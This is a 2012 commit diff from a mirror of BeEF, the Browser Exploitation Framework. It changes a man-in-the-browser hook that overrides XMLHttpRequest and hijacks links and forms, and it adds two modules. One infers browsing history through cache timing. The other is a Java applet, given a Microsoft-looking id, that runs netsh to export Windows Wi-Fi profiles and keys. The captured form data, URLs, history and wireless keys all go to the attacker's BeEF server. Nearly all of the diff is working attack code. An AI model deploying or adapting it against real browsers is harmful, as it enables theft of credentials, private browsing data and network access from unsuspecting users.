Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/beefproject/beef

Browse Source
This commit is contained in:
bcoles
2012-03-12 11:41:08 +10:30
parent dbd6baa7b0 51d6aaa515
commit 9735a7b66f
10 changed files with 786 additions and 118 deletions
Download Patch File Download Diff File Expand all files Collapse all files

313
core/main/client/mitb.js
View File

@@ -15,121 +15,198 @@
//
beef.mitb = {
cid: null,
curl: null,
init: function(cid, curl){
beef.mitb.cid = cid;
beef.mitb.curl = curl;
},
// Initializes the hook on anchors and forms.
hook: function(){
beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);});
beef.onclose.push(function(event) {beef.mitb.endSession();});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
for(var i=0;i<anchors.length;i++){
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for(var i=0;i<forms.length;i++){
beef.mitb.poisonForm(forms[i]);
}
},
// Hooks anchors and prevents them from linking away
poisonAnchor: function(e){
try{
e.preventDefault;
if(beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])){
var title = "";
if(document.getElementsByTagName("title").length == 0){
title = document.title;
}else{
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be: "EF" }, title, e.currentTarget);
}
}catch(e){
console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
// Hooks forms and prevents them from linking away
poisonForm: function(form){
form.onsubmit=function(e){
var inputs = form.getElementsByTagName("input");
var query = "";
for(var i=0;i<inputs.length;i++){
if(i>0 && i<inputs.length-1) query += "&";
switch(inputs[i].type){
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value;
break;
}
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be: "EF" }, "", form.action);
return false;
}
},
// Fetches a hooked form with AJAX
fetchForm: function(url, query, target){
try{
var y = new XMLHttpRequest();
y.open('POST', url, false);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function(){
if(y.readyState == 4 && y.responseText != ""){
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(query);
beef.mitb.sniff("POST: "+url+" ["+query+"]");
return true;
}catch(x){
return false;
}
},
// Fetches a hooked link with AJAX
fetch: function(url, target){
try{
var y = new XMLHttpRequest();
y.open('GET', url,false);
y.onreadystatechange = function(){
if(y.readyState == 4 && y.responseText != ""){
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: "+url);
return true;
}catch(x){
window.open(url);
beef.mitb.sniff("GET [New Window]: "+url);
return false;
}
},
// Relays an entry to the framework
sniff: function(result){
try{
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
}catch(x){}
return true;
},
// Signals the Framework that the user has lost the hook
endSession: function(){
beef.mitb.sniff("Window closed.");
}
}
cid:null,
curl:null,
init:function (cid, curl) {
beef.mitb.cid = cid;
beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/
var xml_type;
if (window.XMLHttpRequest && !(window.ActiveXObject)) {
xml_type = 'XMLHttpRequest';
}
if (xml_type == "XMLHttpRequest") {
beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
/*return :port*/
var requestPort;
if (portR != null) {
requestPort = portR[0].split(":");
}
if ((user == "beef") && (pass == "beef")) {
/*a poisoned something*/
open.call(this, method, url, async, null, null);
}
else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
/*a beef hook.js polling or dh */
open.call(this, method, url, async, null, null);
}
else {
if (method == "GET") {
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}
else {
beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
/*write the url of the page*/
history.pushState({ Be:"EF" }, title, url);
}
}
}
else {
/*if we are here we have an ajax post req*/
beef.mitb.sniff("Post ajax request to: " + url);
open.call(this, method, url, async, user, pass);
}
}
};
})(XMLHttpRequest.prototype.open);
}
},
// Initializes the hook on anchors and forms.
hook:function () {
beef.onpopstate.push(function (event) {
beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
});
beef.onclose.push(function (event) {
beef.mitb.endSession();
});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
for (var i = 0; i < anchors.length; i++) {
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for (var i = 0; i < forms.length; i++) {
beef.mitb.poisonForm(forms[i]);
}
},
// Hooks anchors and prevents them from linking away
poisonAnchor:function (e) {
try {
e.preventDefault;
if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, e.currentTarget);
}
} catch (e) {
console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
// Hooks forms and prevents them from linking away
poisonForm:function (form) {
form.onsubmit = function (e) {
var inputs = form.getElementsByTagName("input");
var query = "";
for (var i = 0; i < inputs.length; i++) {
if (i > 0 && i < inputs.length - 1) query += "&";
switch (inputs[i].type) {
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value;
break;
}
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be:"EF" }, "", form.action);
return false;
}
},
// Fetches a hooked form with AJAX
fetchForm:function (url, query, target) {
try {
var y = new XMLHttpRequest();
y.open('POST', url, false, "beef", "beef");
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(query);
beef.mitb.sniff("POST: " + url + " [" + query + "]");
return true;
} catch (x) {
return false;
}
},
// Fetches a hooked link with AJAX
fetch:function (url, target) {
try {
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: " + url);
return true;
} catch (x) {
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
return false;
}
},
// Relays an entry to the framework
sniff:function (result) {
try {
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
} catch (x) {
}
return true;
},
// Signals the Framework that the user has lost the hook
endSession:function () {
beef.mitb.sniff("Window closed.");
}
}

337
modules/browser/get_history/command.js Normal file
View File

@@ -0,0 +1,337 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
var hidden_iframe = beef.dom.createInvisibleIframe();
hidden_iframe.setAttribute('id','f');
hidden_iframe.setAttribute('name','f');
hidden_iframe.setAttribute('src','about:blank');
hidden_iframe.setAttribute('style','opacity: 0.1');
var results = "";
var tries = 0;
var isIE = 0;
var isFF = 0;
/*******************************
* SUB-MS TIMER IMPLEMENTATION *
*******************************/
var cycles = 0;
var exec_next = null;
function timer_interrupt() {
cycles++;
if (exec_next) {
var cmd = exec_next;
exec_next = null;
cmd();
}
}
if (beef.browser.isFF() == 1) {
window.addEventListener('message', timer_interrupt, false);
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
{ 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
{ 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
{ 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
{ 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
{ 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
{ 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
{ 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 5;
var MAX_ATTEMPTS = 2;
}
if (beef.browser.isIE() == 1) {
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png',
'https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png' ] },
{ 'name': 'Twitter', 'urls': [ 'http://twitter.com/phoenix/favicon.ico',
'https://twitter.com/phoenix/favicon.ico' ] },
{ 'name': 'LinkedIn', 'urls': [ 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
'http://s3.licdn.com/scds/common/u/img/logos/logo_2_237x60.png',
'http://s4.licdn.com/scds/common/u/img/logos/logo_132x32_2.png' ] },
{ 'name': 'Orkut', 'urls': [ 'http://static3.orkut.com/img/gwt/logo_orkut_default.png' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a2.cdnsters.com/static/images/sitewide/logos/dsterBanner-sm.png' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/favicon-refresh-vfldLzJxy.ico' ] },
{ 'name': 'Hulu', 'urls': [ 'http://www.hulu.com/fat-favicon.ico' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/favicon.ico' ] },
{ 'name': 'Wikipedia (EN)', 'urls': [ 'http://en.wikipedia.org/favicon.ico' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/favicon.ico' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://css.nyt.com/images/icons/nyt.ico' ] },
{ 'name': 'CNN', 'urls': [ 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/hdr-main.gif',
'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif' ] },
{ 'name': 'Slashdot', 'urls': [ 'http://slashdot.org/favicon.ico',
'http://a.fsdn.com/sd/logo_w_l.png' ] },
{ 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/favicon.ico' ] },
{ 'name': 'Fox News', 'urls': [ 'http://www.foxnews.com/i/redes/foxnews.ico' ] },
{ 'name': 'AboveTopSecret.com', 'urls': [ 'http://files.abovetopsecret.com/images/atssitelogo-f.png' ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/IMG/wlogo.png' ] /* this session only */ },
{ 'category': 'Commerce' },
{ 'name': 'Diapers.com', 'urls': [ 'http://c4.diapers.com/Images/favicon.ico' ] },
{ 'name': 'Amazon (US)', 'urls': [ 'http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V169459313_.gif' ] },
{ 'name': 'eBay', 'urls': [ 'http://www.ebay.com/favicon.ico' ] },
{ 'name': 'Walmart', 'urls': [ 'http://www.walmart.com/favicon.ico' ] },
{ 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/Nest/Newegg.ico' ] }
];
/*************************
* CONFIGURABLE SETTINGS *
*************************/
var TIME_LIMIT = 1;
var MAX_ATTEMPTS = 1;
}
function sched_call(fn) {
exec_next = fn;
window.postMessage('123', '*');
}
/**********************
* MAIN STATE MACHINE *
**********************/
var log_area;
var target_off = 0;
var attempt = 0;
var confirmed_visited = false;
var current_url, current_name;
var wait_cycles;
var frame_ready = false;
var start, stop, urls;
/* The frame was just pointed to data:... at this point. Initialize a new test, giving the
frame some time to fully load. */
function perform_check() {
wait_cycles = 0;
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_read, 0);
}
if (beef.browser.isFF() == 1) {
setTimeout(wait_for_read, 1);
}
}
/* Confirm that data:... is loaded correctly. */
function wait_for_read() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (beef.browser.isFF() == 1) {
if (!frame_ready) {
setTimeout(wait_for_read, 1);
} else {
document.getElementById('f').contentWindow.stop();
setTimeout(navigate_to_target, 1);
}
}
if (beef.browser.isIE() == 1) {
try{
if (frames['f'].location.href != 'about:blank') throw 1;
//if(document.getElementById('f').contentWindow.location.href != 'about:blank') throw 1;
document.getElementById("f").src ='javascript:"<body onload=\'parent.frame_ready = true\'>"';
setTimeout(wait_for_read2, 0);
} catch (e) {
setTimeout(wait_for_read, 0);
}
}
}
function wait_for_read2() {
if (wait_cycles++ > 100) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry');
return;
}
if (!frame_ready) {
setTimeout(wait_for_read2, 0);
} else {
setTimeout(navigate_to_target, 1);
}
}
/* Navigate the frame to the target URL. */
function navigate_to_target() {
cycles = 0;
if (beef.browser.isFF() == 1) {
sched_call(wait_for_noread);
}
if (beef.browser.isIE() == 1) {
setTimeout(wait_for_noread, 0);
}
urls++;
document.getElementById("f").src = current_url;
}
/* The browser is now trying to load the destination URL. Let's see if
we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache
hit. If not, seems like cache miss. In both cases, the navigation
will be aborted by maybe_test_next(). */
function wait_for_noread() {
try {
if (beef.browser.isIE() == 1) {
if (frames['f'].location.href == undefined){
confirmed_visited = true;
throw 1;
}
if (cycles++ >= TIME_LIMIT) {
maybe_test_next();
return;
}
setTimeout(wait_for_noread, 0);
}
if (beef.browser.isFF() == 1) {
if (document.getElementById('f').contentWindow.location.href == undefined)
{
confirmed_visited = true;
throw 1;
}
if (cycles >= TIME_LIMIT) {
maybe_test_next();
return;
}
sched_call(wait_for_noread);
}
} catch (e) {
confirmed_visited = true;
maybe_test_next();
}
}
function maybe_test_next() {
frame_ready = false;
if (beef.browser.isFF() == 1) {
document.getElementById('f').src = 'data:text/html,<body onload="parent.frame_ready = true">';
}
if (beef.browser.isIE() == 1) {
document.getElementById("f").src = 'about:blank';
}
if (target_off < targets.length) {
if (targets[target_off].category) {
//log_text(targets[target_off].category + ':', 'p', 'category');
target_off++;
}
if (confirmed_visited) {
log_text('Visited: ' + current_name + ' [' + cycles + ':' + attempt + ']', 'li', 'visited');
}
if (confirmed_visited || attempt == MAX_ATTEMPTS * targets[target_off].urls.length) {
if (!confirmed_visited)
//continue;
log_text('Not visited: ' + current_name + ' [' + cycles + '+]', 'li', 'not_visited');
confirmed_visited = false;
target_off++;
attempt = 0;
maybe_test_next();
} else {
current_url = targets[target_off].urls[attempt % targets[target_off].urls.length];
current_name = targets[target_off].name;
attempt++;
perform_check();
}
}
}
/* Just a logging helper. */
function log_text(str, type, cssclass) {
results+="<br>";
results+=str;
//alert(str);
if(target_off==(targets.length-1)){
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results);
setTimeout(reload,3000);
}
}
function reload(){
//window.location.href=window.location.href;
window.location.reload();
}
/* Decides what to do next. May schedule another attempt for the same target,
select a new target, or wrap up the scan. */
/* The handler for "run the test" button on the main page. Dispenses
advice, resets state if necessary. */
function start_stuff() {
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) {
target_off = 0;
attempt = 0;
confirmed_visited = false;
urls = 0;
results = "";
maybe_test_next();
}
else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.');
}
}
beef.execute(function() {
urls = undefined;
exec_next = null;
start_stuff();
});

25
modules/browser/get_history/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_history:
enable: true
category: "Browser"
name: "History Extraction"
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
working: ["FF","IE"]

25
modules/browser/get_history/module.rb Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Get_history < BeEF::Core::Command
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
end

30
modules/host/get_wireless_keys/command.js Normal file
View File

@@ -0,0 +1,30 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';
var output;
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'wirelessZeroConfig' ,
null, applet_archive, null);
output = document.Microsoft_Corporation.getInfo();
if (output) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+output);
}
beef.dom.detachApplet('wirelessZeroConfig');
});

26
modules/host/get_wireless_keys/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_wireless_keys:
enable: true
category: "Host"
name: "Get Wireless Keys"
description: "This module will retrieve the wireless profiles from the target computer. <br/> You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command netsh wlan add profile filename=\"exported_wlan_profiles.xml\". <br/>After that, just launch and connect to the wireless network without any password prompt. <br/><br/> For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
working: ["IE"]
user_notify: ["C", "S", "O", "FF"]

35
modules/host/get_wireless_keys/module.rb Normal file
View File

@@ -0,0 +1,35 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Get_wireless_keys < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar','/wirelessZeroConfig','jar')
end
def post_execute
content = {}
content['result'] = @datastore['result'].to_s
save content
f = File.open("exported_wlan_profiles.xml","w+")
f.write((@datastore['results']).sub("result=",""))
writeToResults = Hash.new
writeToResults['data'] = "Please import "+Dir.pwd+"/exported_wlan_profiles.xml into your windows machine"
BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults)
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar')
end
end

BIN
modules/host/get_wireless_keys/wirelessZeroConfig.class Normal file
View File

Binary file not shown.

BIN
modules/host/get_wireless_keys/wirelessZeroConfig.jar Normal file
View File

Binary file not shown.

113
modules/host/get_wireless_keys/wirelessZeroConfig.java Normal file
View File

@@ -0,0 +1,113 @@
import java.io.*;
import java.util.*;
import java.net.*;
import java.applet.*;
// Keith Lee
// Twitter: @keith55
// http://milo2012.wordpress.com
// keith.lee2012[at]gmail.com
public class wirelessZeroConfig extends Applet{
public static String result = "";
public wirelessZeroConfig(){
super();
return;
}
public static String getInfo() {
return result;
}
public void init() {
if (isWindows()) {
String osVersion= System.getProperty("os.version");
if(osVersion.equals("6.0") || osVersion.equals("6.1")){
result=getWindows();
}
} else {
result = "OS is not supported";
}
}
public static String getWindows(){
String cmd1 = "netsh wlan show profiles";
String cmd2 = "netsh wlan export profile name=";
String keyword1 = "User profiles";
String wlanProfileArr[];
String wlanProfileName;
int match = 0;
int count = 0;
ArrayList<String> profileList = new ArrayList<String>();
try {
//Get wlan profile names
Process p1 = Runtime.getRuntime().exec(cmd1);
BufferedReader in1 = new BufferedReader(new InputStreamReader(p1.getInputStream()));
String line = null;
//Checks if string match "User profiles"
while ((line = in1.readLine()) != null) {
//Checks if string match "User profiles"
if(match==0){
if(line.toLowerCase().contains(keyword1.toLowerCase())){
match=1;
}
}
if(match==1){
if(count>1){
//If string matches the keyword "User Profiles"
line = (line.replaceAll("\\s+$","").replaceAll("^\\s+", ""));
if(line.length()>0){
wlanProfileName = (line.split(":")[1]).replaceAll("\\s+$","").replaceAll("^\\s+", "");;
profileList.add(wlanProfileName);
}
}
count+=1;
}
}
in1.close();
} catch (IOException e) { }
try{
//Export WLAN Profile to XML file
for(Iterator iterator = profileList.iterator(); iterator.hasNext();){
String profileName = iterator.next().toString();
Process p2 = Runtime.getRuntime().exec(cmd2+'"'+profileName+'"');
//Check if exported xml exists
File f = new File("Wireless Network Connection-"+profileName+".xml");
if(f.exists()){
//Read contents of XML file into results variable
FileInputStream fstream = new FileInputStream(f);
DataInputStream in2 = new DataInputStream(fstream);
BufferedReader br = new BufferedReader(new InputStreamReader(in2));
String xmlToStr;
while((xmlToStr = br.readLine()) != null){
result+=xmlToStr;
}
in2.close();
}
}
} catch (IOException e) {
}
return result;
}
public static boolean isWindows() {
String os = System.getProperty("os.name").toLowerCase();
return (os.indexOf("win") >= 0);
}
/**
public static void main(String[] args) {
if (isWindows()) {
String osVersion= System.getProperty("os.version");
System.out.println(osVersion);
if(osVersion.equals("6.0") || osVersion.equals("6.1")){
result=getWindows();
}
} else {
result = "OS is not supported";
}
System.out.println(result);
}
**/
}